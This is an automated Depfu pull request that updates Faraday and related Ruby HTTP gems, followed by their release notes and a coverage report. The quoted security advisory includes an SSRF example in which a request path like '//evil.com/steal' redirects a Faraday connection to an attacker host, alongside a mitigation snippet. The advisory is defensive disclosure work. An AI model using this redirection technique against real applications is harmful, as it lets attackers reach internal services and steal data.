🚨 [security] [ruby] Update faraday 2.12.2 → 2.14.1 (minor)

[depfu]

---

🚨 Your current dependencies have known security vulnerabilities 🚨

This dependency update fixes known security vulnerabilities. Please see the details below and assess their impact carefully. We recommend to merge and deploy this as soon as possible!

---

Here is everything you need to know about this update. Please take a good look at what changed and the test results before merging this pull request.

What changed?

↗️ faraday (indirect, 2.12.2 → 2.14.1) · Repo · Changelog

Security Advisories 🚨

🚨 Faraday affected by SSRF via protocol-relative URL host override in build_exclusive_url

Impact

Faraday's build_exclusive_url method (in lib/faraday/connection.rb) uses Ruby's
URI#merge to combine the connection's base URL with a user-supplied path. Per RFC 3986,
protocol-relative URLs (e.g. //evil.com/path) are treated as network-path references
that override the base URL's host/authority component.

This means that if any application passes user-controlled input to Faraday's get(),
post(), build_url(), or other request methods, an attacker can supply a
protocol-relative URL like //attacker.com/endpoint to redirect the request to an
arbitrary host, enabling Server-Side Request Forgery (SSRF).

The ./ prefix guard added in v2.9.2 (PR #1569) explicitly exempts URLs starting with
/, so protocol-relative URLs bypass it entirely.

Example:

conn = Faraday.new(url: 'https://api.internal.com')
conn.get('//evil.com/steal')
# Request is sent to https://evil.com/steal instead of api.internal.com

Patches

Faraday v2.14.1 is patched against this security issue. All versions of Faraday up to 2.14.0 are affected.

Workarounds

NOTE: Upgrading to Faraday v2.14.1+ is the recommended action to mitigate this issue, however should that not be an option please continue reading.

Applications should validate and sanitize any user-controlled input before passing it to
Faraday request methods. Specifically:

• Reject or strip input that starts with // followed by a non-/ character
• Use an allowlist of permitted path prefixes
• Alternatively, prepend ./ to all user-supplied paths before passing them to Faraday

Example validation:

def safe_path(user_input)
  raise ArgumentError, "Invalid path" if user_input.match?(%r{\A//[^/]})
  user_input
end

Release Notes

2.14.1

Security Note

This release contains a security fix, we recommend all users to upgrade as soon as possible.
A Security Advisory with more details will be posted shortly.

What's Changed

• Add comprehensive AI agent guidelines for Claude, Cursor, and GitHub Copilot by @Copilot in #1642
• Add RFC document for Options architecture refactoring plan by @Copilot in #1644
• Bump actions/checkout from 5 to 6 by @dependabot[bot] in #1655
• Explicit top-level namespace reference by @c960657 in #1657

New Contributors

• @Copilot made their first contribution in #1642

Full Changelog: v2.14.0...v2.14.1

2.14.0

What's Changed

New features ✨

• Use newer UnprocessableContent naming for 422 by @tylerhunt in #1638

Fixes 🐞

• Convert strings to UTF-8 by @c960657 in #1624
• Fix Response#to_hash when response not finished yet by @yykamei in #1639

Misc/Docs 📄

• Lint: use filter_map by @olleolleolle in #1637
• Bump actions/checkout from v4 to v5 by @dependabot[bot] in #1636
• Fixes documentation by @dharamgollapudi in #1635

New Contributors

• @c960657 made their first contribution in #1624
• @dharamgollapudi made their first contribution in #1635
• @tylerhunt made their first contribution in #1638

Full Changelog: v2.13.4...v2.14.0

2.13.4

What's Changed

• Improve error handling logic and add missing test coverage by @iMacTia in #1633

Full Changelog: v2.13.3...v2.13.4

2.13.3

What's Changed

• Fix type assumption in Faraday::Error by @iMacTia in #1630

Full Changelog: v2.13.2...v2.13.3

2.13.2

What's Changed

• CI against Ruby 3.4 by @Earlopain in #1622
• Only load what is required from cgi by @Earlopain in #1623
• Lint rack_builder.rb: avoid naming a method by @olleolleolle in #1626
• Add migrating from rest-client docs section. by @simi in #1625
• Include HTTP method and URL in Faraday::Error messages for improved exception log transparency by @nielsbuus in #1628

New Contributors

• @simi made their first contribution in #1625
• @nielsbuus made their first contribution in #1628

Full Changelog: v2.13.1...v2.13.2

2.13.1

What's Changed

• Logger middleware default options by @yenshirak in #1618
• Fix Style/RedundantParentheses in options/env.rb by @iMacTia in #1620

New Contributors

• @yenshirak made their first contribution in #1618

Full Changelog: v2.13.0...v2.13.1

2.13.0

What's Changed

• feat(ssl options): support SNI hostname by @bf4 in #1615

New Contributors

• @bf4 made their first contribution in #1615

Full Changelog: v2.12.3...v2.13.0

2.12.3

What's Changed

• Remove ruby2_keywords by @tisba in #1616
• Fix thread safety issue by avoiding mutation of proxy options hash by @QWYNG in #1617

New Contributors

• @QWYNG made their first contribution in #1617

Full Changelog: v2.12.2...v2.12.3

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 35 commits:

• Version bump to 2.14.1
• Merge commit from fork
• Explicit top-level namespace reference (#1657)
• Bump actions/checkout from 5 to 6 (#1655)
• Ensure Claude reads the guidelines and allow to plan in a gitignored .ai/PLAN.md doc
• Add RFC document for Options architecture refactoring plan (#1644)
• Add comprehensive AI agent guidelines for Claude, Cursor, and GitHub Copilot (#1642)
• Update Faraday-specific AI agent guidelines
• Add AI agent guidelines specific to Faraday repository
• Version bump to 2.14.0
• Fix `Faraday::Response#to_hash` when request is not finished yet (#1639)
• Use newer Unprocessable Content naming for 422 (#1638)
• Fixes typo (#1635)
• Convert strings to UTF-8 (#1624)
• Bump actions/checkout from 4 to 5 (#1636)
• Lint: use filter_map (#1637)
• Version bump to 2.13.4
• Improve error handling logic and add missing test coverage (#1633)
• Version bump to 2.13.3
• Fix type assumption in `Faraday::Error` (#1630)
• Version bump to 2.13.2
• Include HTTP method and URL in Faraday::Error messages for improved exception log transparency (#1628)
• CONTRIBUTING: update socials links to Mastodon
• Add migrating from rest-client docs section. (#1625)
• Lint rack_builder.rb: avoid naming a method (#1626)
• Only load what is required from `cgi` (#1623)
• CI against Ruby 3.4
• Version bump to 2.13.1
• Fix Style/RedundantParentheses in options/env.rb (#1620)
• Logger middleware default options (#1618)
• Version bump to 2.13.0
• feat(ssl options): support SNI hostname (#1615)
• Version bump to 2.12.3
• Fix thread safety issue by avoiding mutation of proxy options hash (#1617)
• removes ruby2_keywords usage

↗️ faraday-net_http (indirect, 3.4.0 → 3.4.2) · Repo · Changelog

Release Notes

3.4.2

What's Changed

• Use more conservative net-http version constraint by @RDeckard in #53

New Contributors

• @RDeckard made their first contribution in #53

Full Changelog: v3.4.1...v3.4.2

3.4.1

What's Changed

• Prepare Trusted Publisher by @djsmentya in #50

New Contributors

• @djsmentya made their first contribution in #50

Full Changelog: v3.4.0...v3.4.1

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 10 commits:

• Update ci.yml to allow manual runs
• Version bump to 3.4.2
• Use more conservative net-http version constraint (#53)
• Bump actions/checkout from 4 to 5 (#51)
• CI: Fix grammar error in Publish workflow
• CI: Ensure Rake is available in publish action
• v3.4.1
• CI: Add Ruby 3.4 to build matrix
• Use Ruby 3.4.4
• Prepare Trusted Publisher (#50)

↗️ net-http (indirect, 0.6.0 → 0.9.1) · Repo · Changelog

Release Notes

0.9.1

What's Changed

• Raise Net::OpenTimeout when TCPSocket.open raises IO::TimeoutError. by @shioimm in #263
• Freeze more constants for Ractor compatibility by @rhenium in #256

New Contributors

• @shioimm made their first contribution in #263

Full Changelog: v0.9.0...v0.9.1

0.9.0

What's Changed

• open: Never call Timeout.timeout in rescue clause by @osyoyu in #250
• Fixed by misspell -w -error -source=text by @hsbt in #254
• Check whether TCPSocket#initialize supports open_timeout once and without exceptions by @eregon in #252
• Refactor HTTPS tests by @rhenium in #255

New Contributors

• @eregon made their first contribution in #252

Full Changelog: v0.8.0...v0.9.0

0.8.0

Breaking changes

• Minimum Ruby version raised to 2.7 along with the raise of minimum uri gem version (0.11.1)

What's Changed

• [DOC] Fix too stopped documentations by @nobu in #244
• Replace Timeout.timeout with TCPSocket.open(open_timeout:) when available by @osyoyu in #224
• Replace Ruby 3.5 with Ruby 4.0 by @yahonda in #246
• Fix handling of IPv6 literal hosts in Net::HTTPGenericRequest by @taketo1113 in #237
  • This fixes compatibility issue with uri gem 1.1.0+, which made relevant validations strict.

New Contributors

• @yahonda made their first contribution in #246
• @taketo1113 made their first contribution in #237

Full Changelog: v0.7.0...v0.8.0

0.7.0

What's Changed

• [DOC] Fix broken rdoc-ref links by @st0012 in #199
• Don't double-interrupt the test HTTP server by @headius in #197
• Provide a 'Changelog' link on rubygems.org/gems/net-http by @mark-young-atg in #201
• Freeze some constants to improve Ractor compatibility by @osyoyu in #206
• Don't set content type by default by @hsbt in #207
• Support pretty_print by @nobu in #160
• Add a workflow to sync commits to ruby/ruby by @k0kubun in #230

New Contributors

• @st0012 made their first contribution in #199
• @headius made their first contribution in #197
• @mark-young-atg made their first contribution in #201
• @osyoyu made their first contribution in #206

Full Changelog: v0.6.0...v0.7.0

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

---

Depfu will automatically keep this PR conflict-free, as long as you don't add any commits to this branch yourself. You can also trigger a rebase manually by commenting with @depfu rebase.

All Depfu comment commands

@​depfu rebase

Rebases against your default branch and redoes this update

@​depfu recreate

Recreates this PR, overwriting any edits that you've made to it

@​depfu merge

Merges this PR once your tests are passing and conflicts are resolved

@​depfu cancel merge

Cancels automatic merging of this PR

@​depfu close

Closes this PR and deletes the branch

@​depfu reopen

Restores the branch and reopens this PR (if it's closed)

@​depfu pause

Ignores all future updates for this dependency and closes this PR

@​depfu pause [minor|major]

Ignores all future minor/major updates for this dependency and closes this PR

@​depfu resume

Future versions of this dependency will create PRs again (leaves this PR as is)

[coveralls]

Pull Request Test Coverage Report for Build 21842674623

Details

• 0 of 0 changed or added relevant lines in 0 files are covered.
• No unchanged relevant lines lost coverage.
• Overall coverage remained the same at 99.362%

---

Totals
Change from base Build 21807028253:	0.0%
Covered Lines:	779
Relevant Lines:	784

---

💛 - Coveralls